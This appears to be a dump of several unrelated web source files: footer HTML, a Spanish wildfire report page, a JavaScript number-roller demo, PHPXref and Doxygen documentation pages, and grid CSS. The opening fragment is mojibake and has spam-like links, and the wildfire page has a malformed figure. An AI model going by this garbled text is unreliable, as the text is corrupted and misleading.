<span class="subtitle"><a href="">ãã¤ããforã¹ãã¼ããã©ã³</a></span>
<span class="xsmall"><a href="">ã¹ãã¼ããã©ã³ã§ã¢ã¯ã»ã¹ï¼</a></span>
</div>
</div>
<!-- //giftext -->
<div class="clearfix"></div>
</div>
</div>
<div class="contents last">
<ul id="docs" class="centered xsmall">
<li><a href="">ãã¤ãã ãã¼ã </a></li>
<li><a href="">å©ç¨è¦ç´</a></li>
<li><a href="http://www.garage.co.jp/corporate/policy/index.html" target="_blank">å人æ
å ±ä¿è·æ¹é</a></li>
<li><a href="">å¥å
¨åã«é¢ããæé</a></li>
<li><a href="http://sapience.com.tw/logs/site-nipponki/02021638148.html">http://sapience.com.tw/logs/site-nipponki/02021638148.html</a></li>
<li><a href="http://sapience.com.tw/logs/site-nipponki/02021657532.html">http://sapience.com.tw/logs/site-nipponki/02021657532.html</a></li>
<li><a href="">åºåæ²è¼ã«ã¤ãã¦</a></li>
<li class="last"><a href="">ãåãåãã</a>
</ul>
<p class="centered xsmall"><small>Copyright © 2016 All rights reserved.</small></p>
</div>
</footer>
<div class="hide">
<div id="preregister-box">
<p class="preregister-title large">SKIP*HOP(ã¹ãããããã) DUO Deluxe Edition ããã ãsmtb-KDã
</p>
<p class="preregister-text">ãã¤ã³ãºãã£ãªã¼<br/>ãã¯ãªã¢ã©ã³ã¹ãããªãã© ããªãã¹ ã¢ã¤ãã«ãªã³ã¯ ããªã¼ãã³ã¯,SKIP*HOP(ã¹ãããããã) DUO Deluxe Edition ããã ãsmtb-KDã
</p>
<p><a href="" class="btn login preregister-login">Twitterã§ã®èªè¨¼ã«é²ã</a></p>
</div>
</div>
</body>
</html>
|
build/2004130171/index.html | flowsta/mi-news-app | <!doctype html>
<html lang="es">
<head>
<title>Incendio en AGUDO en CASTILLA-MANCHA</title>
<link rel="stylesheet" href="../css/main.css" type="text/css" media="screen" />
<link rel="stylesheet" href="http://cdn.leafletjs.com/leaflet-0.7.2/leaflet.css" />
<script type="text/javascript" src="http://cdn.leafletjs.com/leaflet-0.7.2/leaflet.js?2"></script>
</head>
<body>
<div id="map" style="width:100%; height:400px;"></div>
<h1>Incendio en AGUDO (CASTILLA-MANCHA)</h1>
<p>El incendio que afectó al municipio de AGUDO quemó una superficie forestal de 101.0000} de la comarca de MONTES SUR de la provincia de CIUDAD REAL (CASTILLA-MANCHA).</p>
<p>Se inició en 2004-09-20, se controló en 105 y se extinguió en 225.</p>
<p>La causa del incendio fue MOTORES Y MÁQUINAS (SIN ESPECIFICAR). En la extinción del incendio participaron 95 personas, 6 vehiculos pesados y 2 medios aereos. Hubo 0 muertos y 0 heridos.</p>
<script type="text/javascript">
var map = L.map('map').setView([39.01227700, -4.81729400], 8);
var mapquestLayer = new L.TileLayer('http://{s}.mqcdn.com/tiles/1.0.0/map/{z}/{x}/{y}.png', {
maxZoom: 18,
attribution: 'Data, imagery and map information provided by <a href="http://open.mapquest.co.uk" target="_blank">MapQuest</a>,<a href="http://www.openstreetmap.org/" target="_blank">OpenStreetMap</a> and contributors.',
subdomains: ['otile1','otile2','otile3','otile4']
});
map.addLayer(mapquestLayer);
var marker = L.marker([39.01227700, -4.81729400]).addTo(map);
</script>
</body>
</html> |
css/5/5.10/数字滚动器.html | letshare/code | <!doctype html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="Generator" content="EditPlus®">
<meta name="Author" content="">
<meta name="Keywords" content="">
<meta name="Description" content="">
<title>数字滚动器</title>
<style type="text/css">
*{margin:0;padding:0;}
#changenumber{
border:1px solid;border-radius:5px;
position:absolute;
left:300px;top:300px;
box-shadow:1px 1px 2px 1px #CCC;
width:auto;height:20px;overflow:hidden;
}
#changenumber ul{
width:20px;
border:1px solid;
text-align:center;
position:relative;float:left;top:0;
}
#changenumber li{
height:20px;
border-bottom:1px dashed;
list-style:none;
}
</style>
<script type="text/javascript" src="js/zQuery.js"></script>
<script type="text/javascript">
window.onload =function (){
function createnumber(n,obj){//创建数字函数
for (var i=0;i<n ;i++ )
{
var ul=document.createElement('ul');//创建ul
for (var j=0;j<10 ;j++ )
{
var li=document.createElement('li');//创建li
var text=document.createTextNode(j);//创建文本节点
li.appendChild(text);//在li中填入数字
ul.appendChild(li);//将li放入ul
}
obj.appendChild(ul);//将ul放入容器
}
}
function change(num){//改变数值函数
if (num%10>=0&&num>10)//依次取得数字的每一位并存入数组
{
temp.push(num%10);
num=Math.floor(num/10);
change(num);
}else{
temp.push(num);
}
for (var i=0;i<temp.length ;i++ )
{
move(ul[n-1-i],{top:[-temp[i]*li_height]});//改变某些ul的定位值
}
}
var changenumber=document.getElementById('changenumber');//获得容器
createnumber(9,changenumber);//在容器中创建一个9位数
var ul=changenumber.getElementsByTagName('ul');//获得创建完成的每个ul
var li_height=ul[0].getElementsByTagName('li')[0].offsetHeight;//获取到一个数的高度供定位使用
var n=ul.length;//获取位数
var num=1298453;var temp=[];//num为9位数,temp为改变函数中的暂存数组
setInterval(function (){temp=[];change(num);num+=parseInt(Math.random()*1000);//每当定时器运行时先清空temp的值
},1500);
}
</script>
</head>
<body>
<div id="changenumber"></div>
</body>
</html>
|
_functions/markdown_show_btn.html | mgsolipa/b2evolution_phpxref | <!doctype html public "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/REC-html40/loose.dtd">
<html>
<head>
<title>PHPXRef 0.7.1 : Unnamed Project : Function Reference: markdown_show_btn()</title>
<link rel="stylesheet" href="../sample.css" type="text/css">
<link rel="stylesheet" href="../sample-print.css" type="text/css" media="print">
<style id="hilight" type="text/css"></style>
<meta http-equiv="content-type" content="text/html;charset=iso-8859-1">
</head>
<body bgcolor="#ffffff" text="#000000" link="#801800" vlink="#300540" alink="#ffffff">
<table class="pagetitle" width="100%">
<tr>
<td valign="top" class="pagetitle">
[ <a href="../index.html">Index</a> ]
</td>
<td align="right" class="pagetitle">
<h2 style="margin-bottom: 0px">PHP Cross Reference of Unnamed Project</h2>
</td>
</tr>
</table>
<!-- Generated by PHPXref 0.7.1 at Sat Nov 21 22:13:19 2015 -->
<!-- PHPXref (c) 2000-2010 Gareth Watts - gareth@omnipotent.net -->
<!-- http://phpxref.sourceforge.net/ -->
<script src="../phpxref.js" type="text/javascript"></script>
<script language="JavaScript" type="text/javascript">
<!--
ext='.html';
relbase='../';
subdir='_functions';
filename='index.html';
cookiekey='phpxref';
handleNavFrame(relbase, subdir, filename);
logFunction('markdown_show_btn');
// -->
</script>
<script language="JavaScript" type="text/javascript">
if (gwGetCookie('xrefnav')=='off')
document.write('<p class="navlinks">[ <a href="javascript:navOn()">Show Explorer<\/a> ]<\/p>');
else
document.write('<p class="navlinks">[ <a href="javascript:navOff()">Hide Explorer<\/a> ]<\/p>');
</script>
<noscript>
<p class="navlinks">
[ <a href="../nav.html" target="_top">Show Explorer</a> ]
[ <a href="index.html" target="_top">Hide Navbar</a> ]
</p>
</noscript>
[<a href="../index.html">Top level directory</a>]<br>
<script language="JavaScript" type="text/javascript">
<!--
document.writeln('<table align="right" class="searchbox-link"><tr><td><a class="searchbox-link" href="javascript:void(0)" onMouseOver="showSearchBox()">Search</a><br>');
document.writeln('<table border="0" cellspacing="0" cellpadding="0" class="searchbox" id="searchbox">');
document.writeln('<tr><td class="searchbox-title">');
document.writeln('<a class="searchbox-title" href="javascript:showSearchPopup()">Search History +</a>');
document.writeln('<\/td><\/tr>');
document.writeln('<tr><td class="searchbox-body" id="searchbox-body">');
document.writeln('<form name="search" style="margin:0px; padding:0px" onSubmit=\'return jump()\'>');
document.writeln('<a class="searchbox-body" href="../_classes/index.html">Class<\/a>: ');
document.writeln('<input type="text" size=10 value="" name="classname"><br>');
document.writeln('<a id="funcsearchlink" class="searchbox-body" href="../_functions/index.html">Function<\/a>: ');
document.writeln('<input type="text" size=10 value="" name="funcname"><br>');
document.writeln('<a class="searchbox-body" href="../_variables/index.html">Variable<\/a>: ');
document.writeln('<input type="text" size=10 value="" name="varname"><br>');
document.writeln('<a class="searchbox-body" href="../_constants/index.html">Constant<\/a>: ');
document.writeln('<input type="text" size=10 value="" name="constname"><br>');
document.writeln('<a class="searchbox-body" href="../_tables/index.html">Table<\/a>: ');
document.writeln('<input type="text" size=10 value="" name="tablename"><br>');
document.writeln('<input type="submit" class="searchbox-button" value="Search">');
document.writeln('<\/form>');
document.writeln('<\/td><\/tr><\/table>');
document.writeln('<\/td><\/tr><\/table>');
// -->
</script>
<div id="search-popup" class="searchpopup"><p id="searchpopup-title" class="searchpopup-title">title</p><div id="searchpopup-body" class="searchpopup-body">Body</div><p class="searchpopup-close"><a href="javascript:gwCloseActive()">[close]</a></p></div>
<h3>Function and Method Cross Reference</h3>
<h2><a href="index.html#markdown_show_btn">markdown_show_btn()</a></h2>
<b>Defined at:</b><ul>
<li><a href="../plugins/markdown_plugin/_markdown.plugin.php.html#markdown_show_btn">/plugins/markdown_plugin/_markdown.plugin.php</a> -> <a onClick="logFunction('markdown_show_btn', '/plugins/markdown_plugin/_markdown.plugin.php.source.html#l465')" href="../plugins/markdown_plugin/_markdown.plugin.php.source.html#l465"> line 465</a></li>
</ul>
<b>Referenced 1 times:</b><ul>
<li><a href="../plugins/markdown_plugin/_markdown.plugin.php.html">/plugins/markdown_plugin/_markdown.plugin.php</a> -> <a href="../plugins/markdown_plugin/_markdown.plugin.php.source.html#l543"> line 543</a></li>
</ul>
<!-- A link to the phpxref site in your customized footer file is appreciated ;-) -->
<br><hr>
<table width="100%">
<tr><td>Generated: Sat Nov 21 22:13:19 2015</td>
<td align="right"><i>Cross-referenced by <a href="http://phpxref.sourceforge.net/">PHPXref 0.7.1</a></i></td>
</tr>
</table>
</body></html>
|
NoMeOlvides/NoMeOlvides/Scripts/Contact/Templates/Delete.html | maxiunlm/NoMeOlvides | <h1>{{ 'deleteContactTitle' | translate }}</h1>
<h2>{{ 'deleteQuestion' | translate }}</h2>
<form ng-submit="Delete()" ng-include="'Scripts/Contact/Templates/Form.html'"></form> |
wp-content/themes/themorningafter/includes/compressed.css | gmoulin/saveurcomplices | /* Blueprint Comressed Version */
/* reset.css */
html,body,div,span,applet,object,iframe, h1,h2,h3,h4,h5,h6,p,blockquote,pre, a,abbr,acronym,address,big,cite,code, del,dfn,em,font,img,ins,kbd,q,s,samp, small,strike,strong,sub,sup,tt,var, dl,dt,dd,ol,ul,li, fieldset,form,label,legend, table,caption,tbody,tfoot,thead,tr,th,td{margin:0;padding:0;border:0;font-weight:inherit;font-style:inherit;font-size:100%;font-family:inherit;vertical-align:baseline;}
body{line-height:1;color:#333;background:white;}
table{border-collapse:separate;border-spacing:0;}
caption,th,td{text-align:left;font-weight:normal;}
blockquote:before,blockquote:after,q:before,q:after{content:"";}
blockquote,q{quotes:"" "";}
/* typograpghy.css */
body{font-family: Helvetica, Arial, "Lucida Grande", Verdana, sans-serif;line-height:1.5;}
body{font-size:75%;}
html > body{font-size:12px;}
h1,h2,h3,h4,h5,h6{font-family:Helvetica,Arial,"Lucida Grande",Verdana,sans-serif;color:#111;clear:both;}
h1{font-size:3em;}
h2{font-size:2em;}
h3{font-size:1.5em;line-height:2;}
h4{font-size:1.2em;line-height:1.25;font-weight:bold;}
h5{font-size:1em;font-weight:bold;}
h6{font-size:1em;}
p{margin:0 0 1.5em 0;text-align:justify;}
p.last{margin-bottom:0;}
p img{float:left;margin:1.5em 1.5em 1.5em 0;padding:0;}
p img.top{margin-top:0;}
ul,ol{margin:0 0 1.5em 1.5em;}
ol{list-style-type:decimal;}
dl{margin:1.5em 0;}
dl dt{font-weight:bold;}
a{color:#125AA7;text-decoration:underline;outline:none;}
a:hover{color:#000;}
blockquote{margin:1.5em 0 1.5em 1.5em;color:#666;font-style:italic;}
strong{font-weight:bold;}
em{font-style:italic;}
pre{margin-bottom:1.3em;background:#eee;border:0.1em solid #ddd;padding:1.5em;}
code{font:0.9em Monaco,monospace;}
hr{background:#B2CCFF;color:#B2CCFF;clear:both;float:none;width:100%;height:0.1em;margin:0 0 1.4em 0;border:none;}
* html hr{margin:0 0 1.2em 0;}
table{margin-bottom:1.4em;border-top:0.1em solid #ddd;border-left:0.1em solid #ddd;}
th,td{height:1em;padding:0.2em 0.4em;border-bottom:0.1em solid #ddd;border-right:0.1em solid #ddd;}
th{font-weight:bold;}
label{font-weight:bold;}
textarea{height:180px;width:300px;}
p.small{font-size:0.8em;margin-bottom:1.875em;line-height:1.875em;}
p.large{font-size:1.2em;line-height:2.5em;}
p.quiet{color:#666;}
.hide{display:none;}
/*.alt{color:#666;font-family:"Warnock Pro","Goudy Old Style","Palatino","Book Antiqua",serif;font-size:1.2em;line-height:1%;font-style:italic;}*/
.dquo{margin-left:-.7em;}
p.incr,.incr p{font-size:0.83333em;line-height:1.44em;margin-bottom:1.8em;}
/* grid.css */
body{text-align:center;margin:0;}
.container{text-align:left;position:relative;padding:0;margin:0 auto;width:960px;}
.column{float:left;margin:0 10px;padding:0;}
* html .column{overflow-x:hidden;}
.border{padding-right:9px;margin-right:0;border-right:1px solid #ddd;}
.first{margin-left:0;}
.last{margin-right:0;}
.span-1{width:50px;}
.span-2{width:120px;}
.span-3{width:190px;}
.span-4{width:260px;}
.span-5{width:330px;}
.span-6{width:400px;}
.span-7{width:470px;}
.span-8{width:540px;}
.span-9{width:610px;}
.span-10{width:680px;}
.span-11{width:750px;}
.span-12{width:820px;}
.span-13{width:890px;}
.span-14{width:960px;margin:0;}
.append-1{padding-right:70px;}
.append-2{padding-right:140px;}
.append-3{padding-right:210px;}
.append-4{padding-right:280px;}
.append-5{padding-right:350px;}
.append-6{padding-right:420px;}
.append-7{padding-right:490px;}
.append-8{padding-right:560px;}
.append-9{padding-right:630px;}
.append-10{padding-right:700px;}
.append-11{padding-right:770px;}
.append-12{padding-right:840px;}
.append-13{padding-right:910px;}
.prepend-1{padding-left:70px;}
.prepend-2{padding-left:140px;}
.prepend-3{padding-left:210px;}
.prepend-4{padding-left:280px;}
.prepend-5{padding-left:350px;}
.prepend-6{padding-left:420px;}
.prepend-7{padding-left:490px;}
.prepend-8{padding-left:560px;}
.prepend-9{padding-left:630px;}
.prepend-10{padding-left:700px;}
.prepend-11{padding-left:770px;}
.prepend-12{padding-left:840px;}
.prepend-13{padding-left:910px;}
.box{padding:1.5em;margin-bottom:1.5em;background:#F0F0F0;}
.clear{display:inline-block;}
.clear:after,.container:after{content:".";display:block;height:0;clear:both;visibility:hidden;}
* html .clear{height:1%;}
.clear{display:block;}
img{margin:0 0 1.5em 0;}
.pull-1{margin-left:-70px;}
.pull-2{margin-left:-140px;}
.pull-3{margin-left:-210px;}
.push-0{margin:0 0 0 1.5em;float:right;}
.push-1{margin:0 -88px 0 1.5em;float:right;}
.push-2{margin:0 -158px 0 1.5em;float:right;}
.push-3{margin:0 -228px 0 1.5em;float:right;}
/* buttons.css */
a.button,button{display:block;float:left;margin:0 0.583em 0.667em 0;padding:5px 10px 6px 7px;border:0.1em solid #dedede;border-top:0.1em solid #eee;border-left:0.1em solid #eee;background-color:#f5f5f5;line-height:130%;text-decoration:none;font-weight:bold;color:#565656;cursor:pointer;font:100% "Lucida Grande",Tahoma,Arial,Verdana,sans-serif}
button{width:auto;overflow:visible;padding:4px 10px 3px 7px}
button[type]{padding:5px 10px 5px 7px;line-height:17px}
*:first-child+html button[type]{padding:4px 10px 3px 7px}
button img,a.button img{margin:0 3px -3px 0 !important;padding:0;border:none;width:16px;height:16px}
button:hover,a.button:hover{background-color:#dff4ff;border:0.1em solid #c2e1ef;color:#336699}
a.button:active{background-color:#6299c5;border:1px solid #6299c5;color:#fff}
.positive{color:#529214}
a.positive:hover,button.positive:hover{background-color:#E6EFC2;border:0.1em solid #C6D880;color:#529214}
a.positive:active{background-color:#529214;border:0.1em solid #529214;color:#fff}
.negative{color:#d12f19}
a.negative:hover,button.negative:hover{background:#fbe3e4;border:0.1em solid #fbc2c4}
a.negative:active{background-color:#d12f19;border:0.1em solid #d12f19;color:#fff}
|
css/grid.css | da0ab/minimal-MaterializeCss-grid | @charset "UTF-8";
html {
box-sizing: border-box; }
*, *:before, *:after {
box-sizing: inherit; }
/*********************
Media Query Classes
**********************/
@media only screen and (max-width: 600px) {
.hide-on-small-only, .hide-on-small-and-down {
display: none !important; } }
@media only screen and (max-width: 992px) {
.hide-on-med-and-down {
display: none !important; } }
@media only screen and (min-width: 601px) {
.hide-on-med-and-up {
display: none !important; } }
@media only screen and (min-width: 600px) and (max-width: 992px) {
.hide-on-med-only {
display: none !important; } }
@media only screen and (min-width: 993px) {
.hide-on-large-only {
display: none !important; } }
@media only screen and (min-width: 993px) {
.show-on-large {
display: initial !important; } }
@media only screen and (min-width: 600px) and (max-width: 992px) {
.show-on-medium {
display: initial !important; } }
@media only screen and (max-width: 600px) {
.show-on-small {
display: initial !important; } }
@media only screen and (min-width: 601px) {
.show-on-medium-and-up {
display: initial !important; } }
@media only screen and (max-width: 992px) {
.show-on-medium-and-down {
display: initial !important; } }
.container {
margin: 0 auto;
max-width: 1280px;
width: 80%; }
@media only screen and (min-width: 601px) {
.container {
width: 85%; } }
@media only screen and (min-width: 993px) {
.container {
width: 80%; } }
.container .row {
margin-left: -0.75rem;
margin-right: -0.75rem; }
.section {
padding-top: 1rem;
padding-bottom: 1rem; }
.section.no-pad {
padding: 0; }
.section.no-pad-bot {
padding-bottom: 0; }
.section.no-pad-top {
padding-top: 0; }
.row {
margin-left: auto;
margin-right: auto;
margin-bottom: 20px; }
.row:after {
content: "";
display: table;
clear: both; }
.row .col {
float: left;
box-sizing: border-box;
padding: 0 0.75rem; }
.row .col.s1 {
width: 8.33333%;
margin-left: 0; }
.row .col.s2 {
width: 16.66667%;
margin-left: 0; }
.row .col.s3 {
width: 25%;
margin-left: 0; }
.row .col.s4 {
width: 33.33333%;
margin-left: 0; }
.row .col.s5 {
width: 41.66667%;
margin-left: 0; }
.row .col.s6 {
width: 50%;
margin-left: 0; }
.row .col.s7 {
width: 58.33333%;
margin-left: 0; }
.row .col.s8 {
width: 66.66667%;
margin-left: 0; }
.row .col.s9 {
width: 75%;
margin-left: 0; }
.row .col.s10 {
width: 83.33333%;
margin-left: 0; }
.row .col.s11 {
width: 91.66667%;
margin-left: 0; }
.row .col.s12 {
width: 100%;
margin-left: 0; }
.row .col.offset-s1 {
margin-left: 8.33333%; }
.row .col.offset-s2 {
margin-left: 16.66667%; }
.row .col.offset-s3 {
margin-left: 25%; }
.row .col.offset-s4 {
margin-left: 33.33333%; }
.row .col.offset-s5 {
margin-left: 41.66667%; }
.row .col.offset-s6 {
margin-left: 50%; }
.row .col.offset-s7 {
margin-left: 58.33333%; }
.row .col.offset-s8 {
margin-left: 66.66667%; }
.row .col.offset-s9 {
margin-left: 75%; }
.row .col.offset-s10 {
margin-left: 83.33333%; }
.row .col.offset-s11 {
margin-left: 91.66667%; }
.row .col.offset-s12 {
margin-left: 100%; }
@media only screen and (min-width: 601px) {
.row .col.m1 {
width: 8.33333%;
margin-left: 0; }
.row .col.m2 {
width: 16.66667%;
margin-left: 0; }
.row .col.m3 {
width: 25%;
margin-left: 0; }
.row .col.m4 {
width: 33.33333%;
margin-left: 0; }
.row .col.m5 {
width: 41.66667%;
margin-left: 0; }
.row .col.m6 {
width: 50%;
margin-left: 0; }
.row .col.m7 {
width: 58.33333%;
margin-left: 0; }
.row .col.m8 {
width: 66.66667%;
margin-left: 0; }
.row .col.m9 {
width: 75%;
margin-left: 0; }
.row .col.m10 {
width: 83.33333%;
margin-left: 0; }
.row .col.m11 {
width: 91.66667%;
margin-left: 0; }
.row .col.m12 {
width: 100%;
margin-left: 0; }
.row .col.offset-m1 {
margin-left: 8.33333%; }
.row .col.offset-m2 {
margin-left: 16.66667%; }
.row .col.offset-m3 {
margin-left: 25%; }
.row .col.offset-m4 {
margin-left: 33.33333%; }
.row .col.offset-m5 {
margin-left: 41.66667%; }
.row .col.offset-m6 {
margin-left: 50%; }
.row .col.offset-m7 {
margin-left: 58.33333%; }
.row .col.offset-m8 {
margin-left: 66.66667%; }
.row .col.offset-m9 {
margin-left: 75%; }
.row .col.offset-m10 {
margin-left: 83.33333%; }
.row .col.offset-m11 {
margin-left: 91.66667%; }
.row .col.offset-m12 {
margin-left: 100%; } }
@media only screen and (min-width: 993px) {
.row .col.l1 {
width: 8.33333%;
margin-left: 0; }
.row .col.l2 {
width: 16.66667%;
margin-left: 0; }
.row .col.l3 {
width: 25%;
margin-left: 0; }
.row .col.l4 {
width: 33.33333%;
margin-left: 0; }
.row .col.l5 {
width: 41.66667%;
margin-left: 0; }
.row .col.l6 {
width: 50%;
margin-left: 0; }
.row .col.l7 {
width: 58.33333%;
margin-left: 0; }
.row .col.l8 {
width: 66.66667%;
margin-left: 0; }
.row .col.l9 {
width: 75%;
margin-left: 0; }
.row .col.l10 {
width: 83.33333%;
margin-left: 0; }
.row .col.l11 {
width: 91.66667%;
margin-left: 0; }
.row .col.l12 {
width: 100%;
margin-left: 0; }
.row .col.offset-l1 {
margin-left: 8.33333%; }
.row .col.offset-l2 {
margin-left: 16.66667%; }
.row .col.offset-l3 {
margin-left: 25%; }
.row .col.offset-l4 {
margin-left: 33.33333%; }
.row .col.offset-l5 {
margin-left: 41.66667%; }
.row .col.offset-l6 {
margin-left: 50%; }
.row .col.offset-l7 {
margin-left: 58.33333%; }
.row .col.offset-l8 {
margin-left: 66.66667%; }
.row .col.offset-l9 {
margin-left: 75%; }
.row .col.offset-l10 {
margin-left: 83.33333%; }
.row .col.offset-l11 {
margin-left: 91.66667%; }
.row .col.offset-l12 {
margin-left: 100%; } }
/*# sourceMappingURL=grid.css.map */
|
usr/share/doc/libept-dev/html/hierarchy.html | 2ndy/RaspIM | <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/xhtml;charset=UTF-8"/>
<meta http-equiv="X-UA-Compatible" content="IE=9"/>
<title>libept: Class Hierarchy</title>
<link href="tabs.css" rel="stylesheet" type="text/css"/>
<script type="text/javascript" src="jquery.js"></script>
<script type="text/javascript" src="dynsections.js"></script>
<link href="doxygen.css" rel="stylesheet" type="text/css" />
</head>
<body>
<div id="top"><!-- do not remove this div, it is closed by doxygen! -->
<div id="titlearea">
<table cellspacing="0" cellpadding="0">
<tbody>
<tr style="height: 56px;">
<td style="padding-left: 0.5em;">
<div id="projectname">libept
</div>
</td>
</tr>
</tbody>
</table>
</div>
<!-- end header part -->
<!-- Generated by Doxygen 1.8.1.1 -->
<div id="navrow1" class="tabs">
<ul class="tablist">
<li><a href="index.html"><span>Main Page</span></a></li>
<li><a href="namespaces.html"><span>Namespaces</span></a></li>
<li class="current"><a href="annotated.html"><span>Classes</span></a></li>
<li><a href="files.html"><span>Files</span></a></li>
</ul>
</div>
<div id="navrow2" class="tabs2">
<ul class="tablist">
<li><a href="annotated.html"><span>Class List</span></a></li>
<li class="current"><a href="hierarchy.html"><span>Class Hierarchy</span></a></li>
<li><a href="functions.html"><span>Class Members</span></a></li>
</ul>
</div>
</div><!-- top -->
<div class="header">
<div class="headertitle">
<div class="title">Class Hierarchy</div> </div>
</div><!--header-->
<div class="contents">
<div class="textblock">This inheritance list is sorted roughly, but not completely, alphabetically:</div><div class="directory">
<div class="levels">[detail level <span onclick="javascript:toggleLevel(1);">1</span><span onclick="javascript:toggleLevel(2);">2</span><span onclick="javascript:toggleLevel(3);">3</span>]</div><table class="directory">
<tr id="row_0_" class="even"><td class="entry"><img src="ftv2node.png" alt="o" width="16" height="22" /><img src="ftv2cl.png" alt="C" width="24" height="22" /><a class="el" href="classept_1_1apt_1_1Apt.html" target="_self">ept::apt::Apt</a></td><td class="desc">High-level access to the <a class="el" href="classept_1_1apt_1_1Apt.html" title="High-level access to the Apt cache, as a data provider for the ept framework.">Apt</a> cache, as a data provider for the ept framework</td></tr>
<tr id="row_1_"><td class="entry"><img id="arr_1_" src="ftv2mnode.png" alt="o" width="16" height="22" onclick="toggleFolder('1_')"/><img src="ftv2cl.png" alt="C" width="24" height="22" /><a class="el" href="structAptTestEnvironment.html" target="_self">AptTestEnvironment</a></td><td class="desc"></td></tr>
<tr id="row_1_0_" class="even"><td class="entry"><img src="ftv2vertline.png" alt="|" width="16" height="22" /><img id="arr_1_0_" src="ftv2mnode.png" alt="o" width="16" height="22" onclick="toggleFolder('1_0_')"/><img src="ftv2cl.png" alt="C" width="24" height="22" /><a class="el" href="structDebtagsTestEnvironment.html" target="_self">DebtagsTestEnvironment</a></td><td class="desc"></td></tr>
<tr id="row_1_0_0_"><td class="entry"><img src="ftv2vertline.png" alt="|" width="16" height="22" /><img src="ftv2vertline.png" alt="|" width="16" height="22" /><img src="ftv2node.png" alt="o" width="16" height="22" /><img src="ftv2cl.png" alt="C" width="24" height="22" /><a class="el" href="structTestDebtags.html" target="_self">TestDebtags</a></td><td class="desc"></td></tr>
<tr id="row_1_0_1_" class="even"><td class="entry"><img src="ftv2vertline.png" alt="|" width="16" height="22" /><img src="ftv2vertline.png" alt="|" width="16" height="22" /><img src="ftv2node.png" alt="o" width="16" height="22" /><img src="ftv2cl.png" alt="C" width="24" height="22" /><a class="el" href="structTestExpression.html" target="_self">TestExpression</a></td><td class="desc"></td></tr>
<tr id="row_1_0_2_"><td class="entry"><img src="ftv2vertline.png" alt="|" width="16" height="22" /><img src="ftv2vertline.png" alt="|" width="16" height="22" /><img src="ftv2lastnode.png" alt="\" width="16" height="22" /><img src="ftv2cl.png" alt="C" width="24" height="22" /><a class="el" href="structTestVocabulary.html" target="_self">TestVocabulary</a></td><td class="desc"></td></tr>
<tr id="row_1_1_" class="even"><td class="entry"><img src="ftv2vertline.png" alt="|" width="16" height="22" /><img src="ftv2node.png" alt="o" width="16" height="22" /><img src="ftv2cl.png" alt="C" width="24" height="22" /><a class="el" href="structTestApt.html" target="_self">TestApt</a></td><td class="desc"></td></tr>
<tr id="row_1_2_"><td class="entry"><img src="ftv2vertline.png" alt="|" width="16" height="22" /><img src="ftv2lastnode.png" alt="\" width="16" height="22" /><img src="ftv2cl.png" alt="C" width="24" height="22" /><a class="el" href="structTestAxi.html" target="_self">TestAxi</a></td><td class="desc"></td></tr>
<tr id="row_2_" class="even"><td class="entry"><img id="arr_2_" src="ftv2mnode.png" alt="o" width="16" height="22" onclick="toggleFolder('2_')"/><img src="ftv2cl.png" alt="C" width="24" height="22" /><a class="el" href="structept_1_1debtags_1_1voc_1_1Data.html" target="_self">ept::debtags::voc::Data</a></td><td class="desc">Base class for facet and tag data</td></tr>
<tr id="row_2_0_"><td class="entry"><img src="ftv2vertline.png" alt="|" width="16" height="22" /><img src="ftv2node.png" alt="o" width="16" height="22" /><img src="ftv2cl.png" alt="C" width="24" height="22" /><a class="el" href="classept_1_1debtags_1_1voc_1_1FacetData.html" target="_self">ept::debtags::voc::FacetData</a></td><td class="desc">Representation of a facet</td></tr>
<tr id="row_2_1_" class="even"><td class="entry"><img src="ftv2vertline.png" alt="|" width="16" height="22" /><img src="ftv2lastnode.png" alt="\" width="16" height="22" /><img src="ftv2cl.png" alt="C" width="24" height="22" /><a class="el" href="structept_1_1debtags_1_1voc_1_1TagData.html" target="_self">ept::debtags::voc::TagData</a></td><td class="desc">Representation of a tag</td></tr>
<tr id="row_3_"><td class="entry"><img src="ftv2node.png" alt="o" width="16" height="22" /><img src="ftv2cl.png" alt="C" width="24" height="22" /><a class="el" href="classept_1_1debtags_1_1DebDBParser.html" target="_self">ept::debtags::DebDBParser</a></td><td class="desc">Parse Debian records from a parser input</td></tr>
<tr id="row_4_" class="even"><td class="entry"><img src="ftv2node.png" alt="o" width="16" height="22" /><img src="ftv2cl.png" alt="C" width="24" height="22" /><a class="el" href="classept_1_1debtags_1_1Debtags.html" target="_self">ept::debtags::Debtags</a></td><td class="desc">Access the on-disk <a class="el" href="classept_1_1debtags_1_1Debtags.html" title="Access the on-disk Debtags tag database.">Debtags</a> tag database</td></tr>
<tr id="row_5_"><td class="entry"><img src="ftv2node.png" alt="o" width="16" height="22" /><img src="ftv2cl.png" alt="C" width="24" height="22" /><a class="el" href="structDirMaker.html" target="_self">DirMaker</a></td><td class="desc"></td></tr>
<tr id="row_6_" class="even"><td class="entry"><img src="ftv2node.png" alt="o" width="16" height="22" /><img src="ftv2cl.png" alt="C" width="24" height="22" /><a class="el" href="structept_1_1Sources_1_1Entry.html" target="_self">ept::Sources::Entry</a></td><td class="desc"></td></tr>
<tr id="row_7_"><td class="entry"><img src="ftv2node.png" alt="o" width="16" height="22" /><img src="ftv2cl.png" alt="C" width="24" height="22" /><a class="el" href="classept_1_1apt_1_1Exception.html" target="_self">ept::apt::Exception</a></td><td class="desc"></td></tr>
<tr id="row_8_" class="even"><td class="entry"><img src="ftv2node.png" alt="o" width="16" height="22" /><img src="ftv2cl.png" alt="C" width="24" height="22" /><a class="el" href="structept_1_1popcon_1_1InfoStruct.html" target="_self">ept::popcon::InfoStruct</a></td><td class="desc"></td></tr>
<tr id="row_9_"><td class="entry"><img src="ftv2node.png" alt="o" width="16" height="22" /><img src="ftv2cl.png" alt="C" width="24" height="22" /><a class="el" href="classept_1_1apt_1_1Apt_1_1Iterator.html" target="_self">ept::apt::Apt::Iterator</a></td><td class="desc"></td></tr>
<tr id="row_10_" class="even"><td class="entry"><img src="ftv2node.png" alt="o" width="16" height="22" /><img src="ftv2cl.png" alt="C" width="24" height="22" /><a class="el" href="classept_1_1popcon_1_1Local.html" target="_self">ept::popcon::Local</a></td><td class="desc">Access the results of the local daily popcon scan</td></tr>
